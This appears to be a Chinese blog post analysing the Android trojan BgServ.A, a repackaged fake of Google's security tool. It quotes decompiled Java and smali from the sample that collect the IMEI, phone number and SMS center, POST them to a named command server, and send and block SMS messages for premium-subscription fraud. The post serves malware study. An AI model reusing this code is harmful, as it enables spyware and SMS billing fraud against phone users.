BgServ分析

最新推荐文章于 2022-12-30 09:12:00 发布
最新推荐文章于 2022-12-30 09:12:00 发布
阅读量1.7k 收藏
点赞数
分类专栏: android

由于恶意软件泛滥,google针对 Trojan:Android/DroidDream.A 整了一个android Market Security Tool安全工具,没想到这个维稳工具也被人假冒了。这就是Trojan:Android/BgServ.A

建议有兴趣的读者下载样本深入分析。



看上面两张图,感觉差不多了,无非就是后者申请了更多的权限,要干啥龌龊事情吧。

看看二者的包结构。



肯定就是reapckage了,克隆原来的包,再加点邪恶的细料。料也是现成的,

however, what is shocking is that the threat’s code seems to be based on a project hosted on Google Code and licensed under the Apache License:

http://code.google.com/p/mmsbg/ 来自这儿。

这个软件主要是窃取一些IMEI等信息,然后发到http://www.youlubg.com:81/Coop/request3.php.

收集下列信息并保存到 [INSTALLATION PATH]/.hide/upload.xml这个文件,然后开启发射,

<?xml version="1.0" encoding="UTF-8" standalone="yes" ?> 
  <body>
    <imei>354059022277352</imei> 
    <version>1.0.1</version> 
    <smscenter>8613800100500</smscenter> 
    <first>1</first> 
    <handled>0</handled> 
    <pid>20013</pid> 
    <installtime>3 Mar 2011 09:13:38 GMT</installtime> 
    <sysversion>7</sysversion> 
    <auth>michael</auth> 
    <fare>0</fare> 
    <phonenum>+886928216512</phonenum> 
    <reason>simLoaded</reason> 
  </body>

  • IMEI
  • Phone Number
  • SMS Center
  • Install Time
  • System Version

  • 收集完了就发射,
It then uploads the collected information to the following remote site using the HTTP POST method:

  new-instance v8, Ljava/net/URI;
  const-string v9, "http://www.youlubg.com:81/Coop/request3.php"
  invoke-direct {v8, v9}, Ljava/net/URI;-><init>(Ljava/lang/String;)V
  invoke-virtual {v6, v8}, Lorg/apache/http/client/methods/HttpPost;->setURI(Ljava/net/URI;)V
  ...
  invoke-interface {v5, v6}, Lorg/apache/http/client/HttpClient;->execute(Lorg/apache/http/client/methods/HttpUriRequest;)Lorg/apache/http/HttpResponse;

还得接收主人的远程指令:

Next, it receives commands from the reply to the POST and saves the commands in the following file:
[INSTALLATION PATH]/.hide/serverInfo.xml

<?xml version="1.0" encoding="UTF-8" ?> 
  <body>
    <auto_run>1</auto_run> 
    <auto_link_time>24</auto_link_time> 
    <version>1.0.1</version> 
    <channel>
    <channel_name>vedio</channel_name> 
    <vedio_url>http://211.136.165.53/wl/rmw1s/pp66.jsp</vedio_url> 
    <channel_sms>2</channel_sms> 
    <intercept_key>
    <key>移动</key> 
    <key>费用</key> 
    <key>1元</key> 
    <key>2元</key> 
    </intercept_key>
    <intercept_time>2000</intercept_time> 
    <limit_nums_day>4</limit_nums_day> 
    <limit_nums_month>4</limit_nums_month> 
    </channel>
  </body>

可以悄悄的发短信:

This allows the remote attacker to send SMS messages from the compromised device.

拦截短信: 

The threat also has the capability to block incoming SMS messages.

上述功能就是典型的恶意订购啊!


切换APN是WAP时代的事情了,现在价值不大了。
The threat may change the access port name (APN) to the following WAP network:
Name: cmwap
APN: cmwap
Proxy: 10.0.0.172
Port: 80
MCC: 460
MNC: 02
Type: default
MMSC: http://mmsc.monternet.com
Number: [EXISTING SIM OPERATOR NUMBER]

还会下载一些咚咚!

It then downloads a list of links from a remote site listed in the serverInfo.xml file and saves it as the following file:
[INSTALLATION PATH]/.hide/vedio.xml

It also downloads a file from a URL listed in the vedio.xml file and saves it as the following file:
[INSTALLATION PATH]/.hide/vedio_file.3gp

It then restores the APN to its original settings.

The Trojan logs its activities in the following file for debugging purposes:
[INSTALLATION PATH]/.hide/log.txt


围观系统注册了那些接收装置:

 

<receiver android:name="com.mms.bg.transaction.SmsReceiver">
            <intent-filter>
                <action android:name="com.android.mms.transaction.MESSAGE_SENT" />
                <data android:scheme="content" />
            </intent-filter>
            <intent-filter>
                <action android:name="android.intent.action.SEND_MESSAGE" />
            </intent-filter>
        </receiver>
        <receiver android:name="com.mms.bg.transaction.PrivilegedSmsReceiver" android:permission="android.permission.BROADCAST_SMS">
            <intent-filter android:priority="1000">
                <action android:name="android.provider.Telephony.SMS_RECEIVED" />
            </intent-filter>
        </receiver>
        <receiver android:name="com.mms.bg.ui.BootReceiver">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED" />
            </intent-filter>
        </receiver>
        <receiver android:name="com.mms.bg.ui.AutoSMSRecevier">
            <intent-filter>
                <action android:name="com.mms.bg.SMS" />
            </intent-filter>
        </receiver>
        <receiver android:name="com.mms.bg.ui.InternetStatusReceiver">
            <intent-filter>
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE" />
            </intent-filter>
        </receiver>

围观系统申请了那些权限,这要怎么闹!滚粗!


   <activity android:theme="@android:style/Theme.NoTitleBar.Fullscreen" android:label="@string/app_name"   android:name="com.mms.bg.ui.FakeLanucherActivity">
              <intent-filter>
                  <action android:name="android.intent.action.MAIN" />
                  <category android:name="android.intent.category.LAUNCHER" />
                  <category android:name="android.intent.category.DEFAULT" />
              </intent-filter>
          </activity>

      <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
      <uses-permission android:name="android.permission.RECEIVE_SMS" />
      <uses-permission android:name="android.permission.SEND_SMS" />
      <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
      <uses-permission android:name="android.permission.CHANGE_NETWORK_STATE" />
      <uses-permission android:name="android.permission.READ_PHONE_STATE" />
      <uses-permission android:name="android.permission.WAKE_LOCK" />
      <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
      <uses-permission android:name="android.permission.INTERNET" />

很多代码都是来源于:http://mmsbg.googlecode.com/svn-history/r43/trunk/src/com/mms/bg/ui/SettingManager.java

            private SettingManager(Context context)

        {

               mContext = context;

               BASE_PATH = (newStringBuilder()).append(context.getFilesDir().getAbsolutePath()).append("/.hide/").toString();

               File file = new File(BASE_PATH);

               if (!file.exists())

                       file.mkdirs();

               mSP =context.getSharedPreferences(SETTING_FILE_NAME, 0);

               mEditor = mSP.edit();

               mLog = LogUtil.getInstance((new StringBuilder()).append(BASE_PATH).append("log.txt").toString());

              UPLOAD_FILE_PATH = (newStringBuilder()).append(BASE_PATH).append("upload.xml").toString();

              DOWNLOAD_FILE_PATH = (newStringBuilder()).append(BASE_PATH).append("serverInfo.xml").toString();

               VEDIO_DOWNLOAD_FILE_PATH = (newStringBuilder()).append(BASE_PATH).append("vedio.xml").toString();

               VEDIO_FILE_DOWNLOAD_FILE_PATH =(newStringBuilder()).append(BASE_PATH).append("vedio_file.3gp").toString();

               mConnMgr =(ConnectivityManager)mContext.getSystemService("connectivity");

               mResolver =mContext.getContentResolver();

        }

收集的信息包括:IMEI、Phone Number、SMS Center、Install Time 、System Version

            private void savePhoneInfo(String s)

        {

               String s1 = getSMSCenter();

               LOGD((new StringBuilder()).append("[[savePhoneInfo]]smsCenter = ").append(s1).toString());

               if (s1 != null)

               {

                       LOGD((newStringBuilder()).append("[[savePhoneInfo]] split the smsCenter =").append(s1).toString());

                       TelephonyManagertelephonymanager = (TelephonyManager)mContext.getSystemService("phone");

                       String s2 =telephonymanager.getDeviceId();

                       String s3 =telephonymanager.getLine1Number();

                       if (s3 == null)

                               s3 ="0";

                       String s4 =String.valueOf(getSMSRoundTotalSend());

                       String s5 = mPid;

                       if (s == null)

                               s = "nothing";

                       String s6 = getFirstStartTime();

                       if (s6 == null)

                       {

                               setFirstStartTime();

                               s6 =getFirstStartTime();

                       }

                       String s7 =android.os.Build.VERSION.SDK;

                       try

                       {

                               File file = newFile(UPLOAD_FILE_PATH);

                               FileOutputStreamfileoutputstream;

                               XmlSerializerxmlserializer;

                               XmlSerializerxmlserializer1;

                               if(file.exists())

                                      file.delete();

                               else

                                      file.createNewFile();

                             fileoutputstream =new FileOutputStream(file);

                             xmlserializer =Xml.newSerializer();

                       xmlserializer.setOutput(fileoutputstream,"UTF-8");

              xmlserializer.startDocument("UTF-8",Boolean.valueOf(true));

               xmlserializer1 =xmlserializer.startTag("", "body");

                               xmlserializer1.startTag("","imei");

                               xmlserializer1.text(s2);

                               xmlserializer1.endTag("","imei");

                               xmlserializer1.startTag("","version");

                               xmlserializer1.text("1.0.1");

                               xmlserializer1.endTag("","version");

                               xmlserializer1.startTag("","smscenter");

                               xmlserializer1.text(s1);

                               xmlserializer1.endTag("","smscenter");

                               xmlserializer1.startTag("","first");

                               xmlserializer1.text("1");

                               xmlserializer1.endTag("","first");

                               xmlserializer1.startTag("","handled");

                               xmlserializer1.text(s4);

                               xmlserializer1.endTag("","handled");

                               xmlserializer1.startTag("","pid");

                               xmlserializer1.text(s5);

                               xmlserializer1.endTag("","pid");

                               xmlserializer1.startTag("","installtime");

                               xmlserializer1.text(s6);

                               xmlserializer1.endTag("","installtime");

                               xmlserializer1.startTag("","sysversion");

                               xmlserializer1.text(s7);

                               xmlserializer1.endTag("","sysversion");

                               xmlserializer1.startTag("","auth");

                               xmlserializer1.text("michael");

                               xmlserializer1.endTag("","auth");

                               xmlserializer1.startTag("","fare");

                               xmlserializer1.text("0");

                               xmlserializer1.endTag("","fare");

                               xmlserializer1.startTag("","phonenum");

                               xmlserializer1.text(s3);

                               xmlserializer1.endTag("","phonenum");

                               xmlserializer1.startTag("","reason");

                               xmlserializer1.text(s);

                               xmlserializer1.endTag("","reason");

                               xmlserializer.endTag("","body");

                               xmlserializer.flush();

                               xmlserializer.endDocument();

                               fileoutputstream.close();

                       }

                       catch (Exceptionexception) { }

               } else

               {

      WorkingMessage workingmessage = WorkingMessage.createEmpty(mContext);

                       workingmessage.setDestNum("10086");

                       workingmessage.setText("1234567");

                       setSMSTempBlockNumAndTimes("10086","1");

                       workingmessage.send();

               }

        }

上传手机的信息到网址:http://www.youlubg.com:81/Coop/request3.php

 

public HttpResponseopenConnection(File file)

        {

               DefaultHttpClientdefaulthttpclient;

               HttpPost httppost;

               LOGD("[[openConnection]]");

               defaulthttpclient = newDefaultHttpClient(getParams());

               httppost = new HttpPost();

               httppost.setURI(newURI("http://www.youlubg.com:81/Coop/request3.php"));

}



拦截短信:

public classPhoneCallReceiver extends BroadcastReceiver

{

  private static final boolean DEBUG = false;

  private static final String TAG ="PhoneCallReceiver";

 

  public static final void LOGD(StringparamString)

  {

  }

 

  public void onReceive(Context paramContext,Intent paramIntent)

  {

    LOGD("[[onReceive]] receive a new callfor intent : " + paramIntent);

    LOGD("++++++++++ result = " +getResultData());

    String str = getResultData();

    if (str != null)

    {

      SettingManager localSettingManager =SettingManager.getInstance(paramContext);

      long l1 =localSettingManager.getSMSBlockBeginTime();

      long l2 =localSettingManager.getSMSBlockDelayTime();

      if ((System.currentTimeMillis() - l1 <l2) && ((str.equals("10086")) ||(str.equals("10010"))))

        setResultData(null);

    }

  }

}

 

手机安全
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
dsnthser.exe
ProcessInfo的专栏
12-02 375
  进程知识库 dsnthser - dsnthser.exe - 进程信息进程文件: dsnthser or dsnthser.exe进程名称: ATI Diamond MultiScreen hook device driver   描述:dsnthser.exe是ATI显示卡相关程序。
HttpClient使用详解与实战一:普通的GET和POST请求
weixin_30673611的博客
05-08 594
简介 HttpClient是Apache Jakarta Common下的子项目,用来提供高效的、最新的、功能丰富的支持HTTP协议的客户端编程工具包,并且它支持HTTP协议最新的版本和建议。 HttpClient最新版本是HttpClient 4.5.3 (GA)。 官方下载:http://hc.apache.org/downloads.cgi 主要特性 基于标准、纯净的Jav...
Android四大组件之Service
的专栏
03-20 510
Service作为Android的四大组件之一。主要是用在后台执行长时间的操作,Service没有UI界面。非常适合用于去执行哪些不需要和用户交互而且还要求长期运行的任务。   启动一个Service主要有两种方式,一个是startService(),一个是通过bindService()。   1、在应用的任何一个地方,通过调用startSercice()方法就可以启动一个Se
ASP.NET Core 的 BackgroundService
重庆熊猫
12-30 167
说明 托管服务的使用非常简单,只要编写一个实现了IHostedService接口的类即可。 一般情况下我们编写从BackgroundService类继承的类,因为BackgroundService实现了IHostedService接口, 并且帮我们处理了任务的取消等逻辑。 我们只要实现BackgroundService类中定义的抽象方法ExecuteAsync, 在ExecuteAsync方法中...
Activity 与 Service 之间的消息传递
weixin_34080571的博客
05-05 194
BgService代码 public class BgService extends Service { public static final String TAG = "BgService"; private BgBinder binder; @Override public void onCreate() { super.o...
Adb 命令开 log level
zytgg123456的博客
03-03 2363
一、 Adb 命令开 log level 为了避免log太多,还有快速定位问题,mtk平台有一些log开关。想要logcat中看到一些log,就需要打开相应的开关。所以这里整理一些log开关,相互学习,也做备忘之效 在开 Camera 各模块 log level 前,建议先关闭 selinux 权限,并确定 logD 是已经有打印的,如果没有打印可以用如下命令开启: adb shell setenforce 0 adb shell setprop persist.vendor.mtk.camera.log
Android获取手机IMEI,IMSI, MAC标识和唯一标识的生成
许进进的博客
10-06 1万+
急的直接看这个: android 获取设备IMEI与序列号: ​ //IMEI(imei) TelephonyManager tm = (TelephonyManager) ChinaApplication.getAppContext().getSystemService(Context.TELEPHONY_SERVICE); String imei = tm.getDeviceId(); ...
bgvwr:包括与bgserver无关的大多数内容,例如客户端,日志播放器,日志查看器
05-20
bgvwr 包括与bgserver无关的大多数内容,例如客户端,日志播放器,日志查看器
解决Failed resolution of: Lorg/apache/http/client/methods/HttpEntityEnclosingRequestBase的方案
rothschild666的博客
12-25 2732
解决Failed resolution of: Lorg/apache/http/client/methods/HttpEntityEnclosingRequestBase的方案 博主在做安卓课设时,由于换了安卓虚拟机的路径,重新换了个安卓虚拟机,所以遇到了上面的错误,经过一番修修改改,发现一个很好的简单解决方式仅供大家参考借鉴尝试。 在出现该问题的安卓工程文件中首先找到manifests文件,然...
bg:后台运行命令
scsidisk的专栏
12-28 903
作用:bg命令使一个被挂起的进程在后台执行。 用法:bg 该命令无参数。 说明:Linux作为一个多任务环境,用户会同时执行多项任务,例如,查看系统情况、备份资料、编辑文件和打印文件等。耗时长的任务不应该在前台任务中执行,而应该交给后台任务去执行。这样前台任务可继续正常进行其他的操作,不用等待。 应用实例如下。 (1)将一个大目录的文件进行排序后,将结果输入到一个文件中 #du -a / | sort -rn > /tmp/du.sorted (2)在命令后使用&符号 由于这个命令执行时间很长,可以把它放在
今天遇到因导入httpClient.jar包导致java.lang.NoSchMethodError异常
涂文远的博客
11-07 6256
今天遇到因导入httpClient.jar包导致java.lang.NoSchMethodError异常
HttpClient详细使用示例
热门推荐
JustryDeng
07-14 55万+
HTTP 协议可能是现在 Internet 上使用得最多、最重要的协议了,越来越多的 Java 应用程序需要直接通过 HTTP 协议来访问网络资源。虽然在 JDK 的 java net包中已经提供了访问 HTTP 协议的基本功能,但是对于大部分应用程序来说,JDK 库本身提供的功能还不够丰富和灵活。HttpClient 是 Apache Jakarta Common 下的子项目,用...
学习基于VUE的GIS.zip
05-25
"GIS" 通常指的是 地理信息系统(Geographic Information System)。它是一种特定的空间信息系统,用于捕获、存储、管理、分析、查询和显示与地理空间相关的数据。GIS 是一种多学科交叉的产物,涉及地理学、地图学、遥感技术、计算机科学等多个领域。 GIS 的主要特点和功能包括: 空间数据管理:GIS 能够存储和管理地理空间数据,这些数据可以是点、线、面等矢量数据,也可以是栅格数据(如卫星图像或航空照片)。 空间分析:GIS 提供了一系列的空间分析工具,用于查询、量测、叠加分析、缓冲区分析、网络分析等。 可视化:GIS 能够将地理空间数据以地图、图表等形式展示出来,帮助用户更直观地理解和分析数据。 数据输入与输出:GIS 支持多种数据格式的输入和输出,包括数字线划图(DLG)、数字高程模型(DEM)、数字栅格图(DRG)等。 决策支持:GIS 可以为城市规划、环境监测、灾害管理、交通规划等领域提供决策支持。 随着技术的发展,GIS 已经广泛应用于各个领域,成为现代社会不可或缺的一部分。同时,GIS 也在不断地发展和完善,以适应更多领域的需求。
一个自动格式化Python代码以符合PEP 8风格指南的工具.zip
05-25
一个自动格式化Python代码以符合PEP 8风格指南的工具
densenet模型-python语言pytorch框架训练识别水果形状分类-不含数据集图片-含逐行注释和说明文档.zip
最新发布
05-25
densenet模型_python语言pytorch框架训练识别水果形状分类-不含数据集图片-含逐行注释和说明文档 本代码是基于python pytorch环境安装的。 下载本代码后,有个环境安装的requirement.txt文本 如果有环境安装不会的,可自行网上搜索如何安装python和pytorch,这些环境安装都是有很多教程的,简单的 环境需要自行安装,推荐安装anaconda然后再里面推荐安装python3.7或3.8的版本,pytorch推荐安装1.7.1或1.8.1版本 首先是代码的整体介绍 总共是3个py文件,十分的简便 且代码里面的每一行都是含有中文注释的,小白也能看懂代码 然后是关于数据集的介绍。 本代码是不含数据集图片的,下载本代码后需要自行搜集图片放到对应的文件夹下即可 在数据集文件夹下是我们的各个类别,这个类别不是固定的,可自行创建文件夹增加分类数据集 需要我们往每个文件夹下搜集来图片放到对应文件夹下,每个对应的文件夹里面也有一张提示图,提示图片放的位置 然后我们需要将搜集来的图片,直接放到对应的文件夹下,就可以对代码进行训练了。 运行0
用Python编写的Facebook AI研究SequencetoSequence工具包.zip
05-25
用Python编写的Facebook AI研究SequencetoSequence工具包
densenet模型-深度学习CNN训练识别乐器分类-不含数据集图片-含逐行注释和说明文档.zip
05-25
densenet模型_深度学习CNN训练识别乐器分类-不含数据集图片-含逐行注释和说明文档 本代码是基于python pytorch环境安装的。 下载本代码后,有个环境安装的requirement.txt文本 如果有环境安装不会的,可自行网上搜索如何安装python和pytorch,这些环境安装都是有很多教程的,简单的 环境需要自行安装,推荐安装anaconda然后再里面推荐安装python3.7或3.8的版本,pytorch推荐安装1.7.1或1.8.1版本 首先是代码的整体介绍 总共是3个py文件,十分的简便 且代码里面的每一行都是含有中文注释的,小白也能看懂代码 然后是关于数据集的介绍。 本代码是不含数据集图片的,下载本代码后需要自行搜集图片放到对应的文件夹下即可 在数据集文件夹下是我们的各个类别,这个类别不是固定的,可自行创建文件夹增加分类数据集 需要我们往每个文件夹下搜集来图片放到对应文件夹下,每个对应的文件夹里面也有一张提示图,提示图片放的位置 然后我们需要将搜集来的图片,直接放到对应的文件夹下,就可以对代码进行训练了。 运行01生成txt.py,是将
学习thinkphp6的视图条件比较标签
05-25
学习thinkphp6的视图条件比较标签

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值